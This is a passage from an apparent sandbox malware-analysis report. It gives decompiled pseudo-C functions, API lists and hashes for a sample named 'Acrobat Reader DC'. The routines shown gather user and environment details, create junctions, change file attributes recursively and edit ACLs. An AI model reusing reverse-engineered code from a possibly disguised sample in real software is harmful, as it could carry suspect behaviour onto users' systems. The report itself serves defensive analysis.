                                  								__eax =  &_v100;
                                  								goto L19;
                                  							case 0x42:
                                  								E0040E710("\r", _t215, _t217);
                                  								E00402250( &_a12);
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x43:
                                  								"\n" = E0040E710("\n", __ebx, __ecx);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x44:
                                  								L"\r\n" = E0040E710(L"\r\n", __ebx, __ecx);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x45:
                                  								__ecx =  &_v52;
                                  								GetDesktopWindow() = GetWindowRect(__eax,  &_v52);
                                  								__edi = _v52.right;
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = __edi;
                                  								goto L143;
                                  							case 0x46:
                                  								__edx =  &_v52;
                                  								GetDesktopWindow() = GetWindowRect(__eax,  &_v52);
                                  								__edi = _v52.bottom;
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = __edi;
                                  								goto L143;
                                  							case 0x47:
                                  								__edi = GetDesktopWindow();
                                  								__eax = GetDC(__edi);
                                  								_a8 = __eax;
                                  								__eax = GetDeviceCaps(__eax, 0xc);
                                  								__esi = __ebx;
                                  								_v8 = __eax;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								__ecx = _a8;
                                  								__eax = _v8;
                                  								 *((intOrPtr*)(__ebx + 8)) = 1;
                                  								 *__ebx = _v8;
                                  								__eax = ReleaseDC(__edi, _a8);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x48:
                                  								__edi = GetDesktopWindow();
                                  								__eax = GetDC(__edi);
                                  								_a8 = __eax;
                                  								__eax = GetDeviceCaps(__eax, 0x74);
                                  								__esi = __ebx;
                                  								_v8 = __eax;
                                  								E00408F40(__edi, __ebx) = _a8;
                                  								__edx = _v8;
                                  								 *((intOrPtr*)(__ebx + 8)) = 1;
                                  								 *__ebx = _v8;
                                  								__eax = ReleaseDC(__edi, _a8);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x49:
                                  								__eax =  *0x4a7f54;
                                  								__eflags = __eax - 3;
                                  								if(__eax == 3) {
                                  									goto L128;
                                  								} else {
                                  									__eflags = __eax - 4;
                                  									if(__eax != 4) {
                                  										goto L141;
                                  									} else {
                                  										goto L128;
                                  									}
                                  								}
                                  								goto L143;
                                  							case 0x4a:
                                  								__ecx =  &_v628;
                                  								__eax = GetEnvironmentVariableW(L"COMSPEC", __ecx, 0x104);
                                  								goto L18;
                                  							case 0x4b:
                                  								"\t" = E0040E710("\t", __ebx, __ecx);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x4c:
                                  								__eax =  &_a4;
                                  								__ecx =  &_v628;
                                  								_a4 = 0x104;
                                  								__eax = GetUserNameW(__ecx,  &_a4);
                                  								goto L18;
                                  							case 0x4d:
                                  								__edx =  &_v628;
                                  								__eax = GetTempPathW(0x104,  &_v628);
                                  								__esi =  &_v628;
                                  								__eax = E00410290( &_v628, __eflags);
                                  								goto L18;
                                  							case 0x4e:
                                  								__edx =  &_v628;
                                  								__eax = GetEnvironmentVariableW(L"USERPROFILE",  &_v628, 0x104);
                                  								goto L18;
                                  							case 0x4f:
                                  								 &_v628 = GetEnvironmentVariableW(L"HOMEDRIVE",  &_v628, 0x104);
                                  								goto L18;
                                  							case 0x50:
                                  								__ecx =  &_v628;
                                  								__eax = GetEnvironmentVariableW(L"HOMEPATH", __ecx, 0x104);
                                  								goto L18;
                                  							case 0x51:
                                  								__edx =  &_v628;
                                  								__eax = GetEnvironmentVariableW(L"HOMESHARE",  &_v628, 0x104);
                                  								goto L18;
                                  							case 0x52:
                                  								 &_v628 = GetEnvironmentVariableW(L"LOGONSERVER",  &_v628, 0x104);
                                  								goto L18;
                                  							case 0x53:
                                  								__ecx =  &_v628;
                                  								__eax = GetEnvironmentVariableW(L"USERDOMAIN", __ecx, 0x104);
                                  								goto L18;
                                  							case 0x54:
                                  								__edx =  &_v628;
                                  								__eax = GetEnvironmentVariableW(L"USERDNSDOMAIN",  &_v628, 0x104);
                                  								goto L18;
                                  							case 0x55:
                                  								goto L144;
                                  							case 0x56:
                                  								__edi =  *(__esi + 0x148);
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = __edi;
                                  								L143:
                                  								 *((intOrPtr*)(__ebx + 8)) = 1;
                                  								goto L144;
                                  							case 0x57:
                                  								__eax =  *(__esi + 0x14c);
                                  								goto L19;
                                  							case 0x58:
                                  								__eax = GetCurrentProcessId();
                                  								_a8 = __eax;
                                  								asm("fild dword [ebp+0xc]");
                                  								__eflags = __eax;
                                  								if(__eax < 0) {
                                  									__fp0 = __fp0 +  *0x48cd18;
                                  								}
                                  								__esi = __ebx;
                                  								_v12 = __fp0;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								__fp0 = _v12;
                                  								__ecx =  &_a12;
                                  								 *__ebx = _v12;
                                  								 *((intOrPtr*)(__ebx + 8)) = 3;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x59:
                                  								__esi =  &_v628;
                                  								__edx = L"Control Panel\\Appearance";
                                  								__eax = E0040F250(L"Control Panel\\Appearance",  &_v628, 0x80000001, L"SchemeLangID", 0x104);
                                  								__eax = _v628 & 0x0000ffff;
                                  								_a4 = _v628 & 0x0000ffff;
                                  								__eax = E00432E88(__eax, 0, __esi, 4);
                                  								L18:
                                  								_t38 =  &_v628; // 0x48bf60
                                  								__eax = _t38;
                                  								L19:
                                  								__eax = E0040E710(__eax, __ebx, __ecx);
                                  								_t39 =  &_a12; // 0x48c1e0
                                  								__ecx = _t39;
                                  								E00402250(_t39) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  						}
                                  					}
                                  				} else {
                                  					_t232 =  &_v36;
                                  					E00401B10("@",  &_v36, _t239);
                                  					_a8 = 0;
                                  					E0040BD50(_t232, _t241,  &_a12);
                                  					E0040C2C0(0, _t232,  &_v8,  &_a8);
                                  					_t207 = _v8;
                                  					if(_v8 != 0) {
                                  						E00408E80(_t215, 0, _t207);
                                  						E00402250( &_v36);
                                  						E00402250( &_a12);
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						E00402250(_t232);
                                  						E00402250( &_a12);
                                  						return 1;
                                  					}
                                  				}
                                  				L145:
                                  			}

                                  0x00472c64
                                  0x00000000
                                  0x00472c66
                                  0x00472c66
                                  0x00472c69
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00472c69
                                  0x00000000
                                  0x00000000
                                  0x00472c06
                                  0x00472c12
                                  0x00000000
                                  0x00000000
                                  0x0047223d
                                  0x00472242
                                  0x0047224a
                                  0x0047224a
                                  0x00472252
                                  0x00000000
                                  0x00000000
                                  0x00472c3f
                                  0x00472c43
                                  0x00472c4a
                                  0x00472c51
                                  0x00000000
                                  0x00000000
                                  0x00472c1d
                                  0x00472c29
                                  0x00472c2f
                                  0x00472c35
                                  0x00000000
                                  0x00000000
                                  0x00472c86
                                  0x00472c92
                                  0x00000000
                                  0x00000000
                                  0x00472cae
                                  0x00000000
                                  0x00000000
                                  0x00472cbe
                                  0x00472cca
                                  0x00000000
                                  0x00000000
                                  0x00472cda
                                  0x00472ce6
                                  0x00000000
                                  0x00000000
                                  0x00472d02
                                  0x00000000
                                  0x00000000
                                  0x00472d12
                                  0x00472d1e
                                  0x00000000
                                  0x00000000
                                  0x00472d2e
                                  0x00472d3a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00472d45
                                  0x00472d4b
                                  0x00472d4d
                                  0x00472d52
                                  0x00472dad
                                  0x00472dad
                                  0x00000000
                                  0x00000000
                                  0x00472d56
                                  0x00000000
                                  0x00000000
                                  0x00472d61
                                  0x00472d67
                                  0x00472d6a
                                  0x00472d6d
                                  0x00472d6f
                                  0x00472d71
                                  0x00472d71
                                  0x00472d77
                                  0x00472d79
                                  0x00472d7c
                                  0x00472d81
                                  0x00472d84
                                  0x00472d87
                                  0x00472d89
                                  0x00472d95
                                  0x00472d95
                                  0x00472d9d
                                  0x00000000
                                  0x00000000
                                  0x004729e3
                                  0x004729e9
                                  0x004729ee
                                  0x004729f3
                                  0x00472a03
                                  0x00472a06
                                  0x004722c1
                                  0x004722c1
                                  0x004722c1
                                  0x004722c7
                                  0x004722c7
                                  0x004722cc
                                  0x004722cc
                                  0x004722d4
                                  0x004722d4
                                  0x004722dc
                                  0x00000000
                                  0x00000000
                                  0x004721da
                                  0x0047215e
                                  0x00472163
                                  0x00472166
                                  0x00472171
                                  0x00472178
                                  0x00472187
                                  0x0047218c
                                  0x00472191
                                  0x004721b1
                                  0x004721b9
                                  0x004721c1
                                  0x004721c6
                                  0x004721ce
                                  0x00472193
                                  0x00472195
                                  0x0047219d
                                  0x004721ad
                                  0x004721ad
                                  0x00472191
                                  0x00000000

                                  APIs
                                  • _memset.LIBCMT ref: 00472103
                                  • _memset.LIBCMT ref: 00472121
                                  • GetLocalTime.KERNEL32(?), ref: 004722A2
                                  • __swprintf.LIBCMT ref: 004722B9
                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                  • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                  • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                  • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                  • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                  • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                  • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                  • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FolderPath$_memset$LocalTime__swprintf
                                  • String ID: %.3d
                                  • API String ID: 645292623-986655627
                                  • Opcode ID: 48c07388412e252f080c16643772a7d18a3b55828c11779c89d55816a2428872
                                  • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                  • Opcode Fuzzy Hash: 48c07388412e252f080c16643772a7d18a3b55828c11779c89d55816a2428872
                                  • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00431BE8(long _a4, WCHAR* _a8, intOrPtr _a12) {
                                  				char _v524;
                                  				char _v2068;
                                  				short _v2072;
                                  				short _v2074;
                                  				signed short _v2080;
                                  				void _v2084;
                                  				short _v2604;
                                  				long _t31;
                                  				int _t35;
                                  				signed short _t44;
                                  				int _t46;
                                  				WCHAR* _t52;
                                  				signed int _t69;
                                  				void* _t74;
                                  				void* _t77;
                                  
                                  				_t62 = _a4;
                                  				_t52 = _a8;
                                  				_t31 = GetFullPathNameW(_a4, 0x104,  &_v2604,  &_a8);
                                  				if(_t31 != 0) {
                                  					E0041329B(_t62,  &_v524, L"\\??\\%s",  &_v2604);
                                  					_t69 = E004111C1( &_v524);
                                  					if( *((short*)(_t77 + _t69 * 2 - 0x20a)) == 0x5c &&  *((short*)(_t77 + _t69 * 2 - 0x20c)) != 0x3a) {
                                  						 *((short*)(_t77 + _t69 * 2 - 0x20a)) = 0;
                                  					}
                                  					_t35 = CreateDirectoryW(_t52, 0);
                                  					if(_t35 != 0 || _a12 != _t35) {
                                  						_t74 = CreateFileW(_t52, 0x40000000, 0, 0, 3, 0x2200000, 0);
                                  						if(_t74 == 0xffffffff) {
                                  							L11:
                                  							RemoveDirectoryW(_t52);
                                  							return 0;
                                  						} else {
                                  							E00412F40( &_v2084, 0, 0x14);
                                  							_v2074 = _t69 + _t69;
                                  							_v2084 = 0xa0000003;
                                  							_v2072 = _v2074 + 2;
                                  							E00412FBA( &_v2068,  &_v524, 0x104);
                                  							_t44 = _v2074 + 0xc;
                                  							_v2080 = _t44;
                                  							_t46 = DeviceIoControl(_t74, 0x900a4,  &_v2084, (_t44 & 0x0000ffff) + 8, 0, 0,  &_a4, 0);
                                  							_push(_t74);
                                  							if(_t46 != 0) {
                                  								CloseHandle();
                                  								return 1;
                                  							} else {
                                  								CloseHandle();
                                  								goto L11;
                                  							}
                                  						}
                                  					} else {
                                  						return _t35;
                                  					}
                                  				} else {
                                  					return _t31;
                                  				}
                                  			}



















                                  APIs
                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                  • __swprintf.LIBCMT ref: 00431C2E
                                  • _wcslen.LIBCMT ref: 00431C3A
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                  • String ID: :$\$\??\%s
                                  • API String ID: 2192556992-3457252023
                                  • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                  • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                  • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                  • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00431A86(intOrPtr __ecx, WCHAR* _a4, signed int _a8, signed int _a12, char _a16) {
                                  				struct _WIN32_FIND_DATAW _v596;
                                  				intOrPtr _v600;
                                  				void* _t33;
                                  				void* _t34;
                                  				void* _t43;
                                  				void* _t46;
                                  				void* _t55;
                                  				void* _t77;
                                  				void* _t83;
                                  				signed int _t89;
                                  				void* _t91;
                                  
                                  				_t91 = (_t89 & 0xfffffff8) - 0x254;
                                  				_v600 = __ecx;
                                  				_t55 = 0;
                                  				_t83 = FindFirstFileW(_a4,  &_v596);
                                  				if(_t83 == 0xffffffff) {
                                  					L7:
                                  					FindClose(_t83);
                                  					if(_a16 != 0) {
                                  						_t77 = FindFirstFileW("*.*",  &_v596);
                                  						if(_t77 == 0xffffffff) {
                                  							L18:
                                  							FindClose(_t77);
                                  							return 1;
                                  						} else {
                                  							do {
                                  								if((_v596.dwFileAttributes & 0x00000010) == 0) {
                                  									goto L17;
                                  								} else {
                                  									_t33 = E0041313C( &(_v596.cFileName), ".");
                                  									_t91 = _t91 + 8;
                                  									if(_t33 == 0) {
                                  										goto L17;
                                  									} else {
                                  										_t34 = E0041313C( &(_v596.cFileName), 0x48ab30);
                                  										_t91 = _t91 + 8;
                                  										if(_t34 == 0) {
                                  											goto L17;
                                  										} else {
                                  											SetCurrentDirectoryW( &(_v596.cFileName));
                                  											if(E00431A86(_v600, _a4, _a8, _a12, _a16) == 0) {
                                  												FindClose(_t77);
                                  												return 0;
                                  											} else {
                                  												SetCurrentDirectoryW(0x48ab30);
                                  												goto L17;
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L20;
                                  								L17:
                                  							} while (FindNextFileW(_t77,  &_v596) != 0);
                                  							goto L18;
                                  						}
                                  					} else {
                                  						return _t55;
                                  					}
                                  				} else {
                                  					do {
                                  						_t43 = E0041313C( &(_v596.cFileName), ".");
                                  						_t91 = _t91 + 8;
                                  						if(_t43 == 0) {
                                  							goto L6;
                                  						} else {
                                  							_t46 = E0041313C( &(_v596.cFileName), 0x48ab30);
                                  							_t91 = _t91 + 8;
                                  							if(_t46 == 0) {
                                  								goto L6;
                                  							} else {
                                  								if(SetFileAttributesW( &(_v596.cFileName), (GetFileAttributesW( &(_v596.cFileName)) | _a8) &  !_a12) == 0) {
                                  									FindClose(_t83);
                                  									return 0;
                                  								} else {
                                  									_t55 = 1;
                                  									goto L6;
                                  								}
                                  							}
                                  						}
                                  						goto L20;
                                  						L6:
                                  					} while (FindNextFileW(_t83,  &_v596) != 0);
                                  					goto L7;
                                  				}
                                  				L20:
                                  			}















                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                  • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                  • FindClose.KERNEL32(00000000), ref: 00431B20
                                  • FindClose.KERNEL32(00000000), ref: 00431B34
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                  • FindClose.KERNEL32(00000000), ref: 00431BCD
                                  • FindClose.KERNEL32(00000000), ref: 00431BDB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                  • String ID: *.*
                                  • API String ID: 1409584000-438819550
                                  • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                  • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                  • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                  • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00442886(intOrPtr __ecx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                  				intOrPtr _v8;
                                  				struct _WIN32_FIND_DATAW _v604;
                                  				void* _t32;
                                  				void* _t33;
                                  				void* _t42;
                                  				void* _t45;
                                  				void* _t47;
                                  				void* _t50;
                                  				void* _t66;
                                  				void* _t67;
                                  				void* _t69;
                                  
                                  				_v8 = __ecx;
                                  				_t50 = 0;
                                  				_t67 = FindFirstFileW(_a4,  &_v604);
                                  				if(_t67 == 0xffffffff) {
                                  					L7:
                                  					FindClose(_t67);
                                  					if(_a16 != 0) {
                                  						_t66 = FindFirstFileW("*.*",  &_v604);
                                  						if(_t66 == 0xffffffff) {
                                  							L18:
                                  							FindClose(_t66);
                                  							return 1;
                                  						} else {
                                  							do {
                                  								if((_v604.dwFileAttributes & 0x00000010) == 0) {
                                  									goto L17;
                                  								} else {
                                  									_t32 = E0041313C( &(_v604.cFileName), ".");
                                  									_t69 = _t69 + 8;
                                  									if(_t32 == 0) {
                                  										goto L17;
                                  									} else {
                                  										_t33 = E0041313C( &(_v604.cFileName), 0x48ab30);
                                  										_t69 = _t69 + 8;
                                  										if(_t33 == 0) {
                                  											goto L17;
                                  										} else {
                                  											SetCurrentDirectoryW( &(_v604.cFileName));
                                  											if(E00442886(_v8, _a4, _a8, _a12, _a16) == 0) {
                                  												FindClose(_t66);
                                  												return 0;
                                  											} else {
                                  												SetCurrentDirectoryW(0x48ab30);
                                  												goto L17;
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L20;
                                  								L17:
                                  							} while (FindNextFileW(_t66,  &_v604) != 0);
                                  							goto L18;
                                  						}
                                  					} else {
                                  						return _t50;
                                  					}
                                  				} else {
                                  					do {
                                  						_t42 = E0041313C( &(_v604.cFileName), ".");
                                  						_t69 = _t69 + 8;
                                  						if(_t42 == 0) {
                                  							goto L6;
                                  						} else {
                                  							_t45 = E0041313C( &(_v604.cFileName), 0x48ab30);
                                  							_t69 = _t69 + 8;
                                  							if(_t45 == 0) {
                                  								goto L6;
                                  							} else {
                                  								_t47 = E00433C08( &(_v604.cFileName), _a8, _a12);
                                  								_t69 = _t69 + 0xc;
                                  								if(_t47 == 0) {
                                  									FindClose(_t67);
                                  									return 0;
                                  								} else {
                                  									_t50 = 1;
                                  									goto L6;
                                  								}
                                  							}
                                  						}
                                  						goto L20;
                                  						L6:
                                  					} while (FindNextFileW(_t67,  &_v604) != 0);
                                  					goto L7;
                                  				}
                                  				L20:
                                  			}















                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                  • FindClose.KERNEL32(00000000), ref: 0044291C
                                  • FindClose.KERNEL32(00000000), ref: 00442930
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                  • FindClose.KERNEL32(00000000), ref: 004429D4
                                    • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                  • FindClose.KERNEL32(00000000), ref: 004429E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                  • String ID: *.*
                                  • API String ID: 2640511053-438819550
                                  • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                  • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                  • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                  • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00446124(void* __eflags, void* _a4, void* _a8, intOrPtr _a12) {
                                  				char _v5;
                                  				struct _ACL* _v12;
                                  				void* _v16;
                                  				struct _ACL* _v20;
                                  				struct _ACL* _v24;
                                  				long _v28;
                                  				char _v32;
                                  				int _v36;
                                  				int _v40;
                                  				intOrPtr _v48;
                                  				void _v52;
                                  				struct _ACL* _t70;
                                  				void* _t74;
                                  				void* _t78;
                                  				void* _t84;
                                  				void _t88;
                                  				struct _ACL* _t94;
                                  				signed short _t113;
                                  				intOrPtr* _t115;
                                  				struct _SECURITY_DESCRIPTOR* _t116;
                                  				long _t117;
                                  				void* _t118;
                                  				void* _t119;
                                  
                                  				_t118 = 0;
                                  				_t94 = 0;
                                  				_v5 = 0;
                                  				_v20 = 0;
                                  				_v24 = 0;
                                  				_v16 = 0;
                                  				_v28 = 4;
                                  				if(E00436E2B(_a4,  &_v28,  &_v20,  &_v32) == 0 || E00436DF7( &_v24, _v32) == 0) {
                                  					L20:
                                  					E00436BA9(_v20);
                                  					E00436BA9(_v24);
                                  					E00436BA9(_t94);
                                  					E00436BA9(_t118);
                                  					return _v5;
                                  				} else {
                                  					_v12 = 0;
                                  					if(GetSecurityDescriptorDacl(_v20,  &_v36,  &_v12,  &_v40) == 0) {
                                  						goto L20;
                                  					}
                                  					E00412F40( &_v52, 0, 0xc);
                                  					_t70 = _v12;
                                  					_t119 = _t119 + 0xc;
                                  					_v48 = 8;
                                  					if(_t70 == 0 || GetAclInformation(_t70,  &_v52, 0xc, 2) != 0) {
                                  						_t24 = GetLengthSid(_a8) * 2; // 0x18
                                  						_t74 = E00436DBF( &_v16, _v48 + _t24 + 0x10);
                                  						_t94 = _v16;
                                  						if(_t74 == 0) {
                                  							goto L20;
                                  						}
                                  						if(_v36 == _t118) {
                                  							L12:
                                  							_t36 = GetLengthSid(_a8) + 8; // 0x8
                                  							_t113 = _t36;
                                  							_t118 = E00436B91(_t113);
                                  							_t119 = _t119 + 4;
                                  							if(_t118 == 0) {
                                  								goto L20;
                                  							}
                                  							_t78 = _a8;
                                  							_t38 = _t118 + 8; // 0x8
                                  							 *(_t118 + 2) = _t113;
                                  							if(CopySid(GetLengthSid(_t78), _t38, _t78) == 0) {
                                  								goto L20;
                                  							}
                                  							_a8 = 0;
                                  							_t115 = _a12 + 4;
                                  							while(1) {
                                  								 *_t118 =  *((intOrPtr*)(_t115 - 4));
                                  								 *((char*)(_t118 + 1)) =  *((intOrPtr*)(_t115 - 3));
                                  								 *((intOrPtr*)(_t118 + 4)) =  *_t115;
                                  								if(AddAce(_t94, 2, 0xffffffff, _t118,  *(_t118 + 2) & 0x0000ffff) == 0) {
                                  									goto L20;
                                  								}
                                  								_t84 = _a8 + 1;
                                  								_t115 = _t115 + 0xc;
                                  								_a8 = _t84;
                                  								if(_t84 < 2) {
                                  									continue;
                                  								}
                                  								_t116 = _v24;
                                  								if(SetSecurityDescriptorDacl(_t116, 1, _t94, 0) != 0 && SetUserObjectSecurity(_a4,  &_v28, _t116) != 0) {
                                  									_v5 = 1;
                                  								}
                                  								goto L20;
                                  							}
                                  							goto L20;
                                  						}
                                  						_t88 = _v52;
                                  						if(_t88 == _t118) {
                                  							goto L12;
                                  						}
                                  						_t117 = 0;
                                  						if(_t88 <= _t118) {
                                  							goto L12;
                                  						}
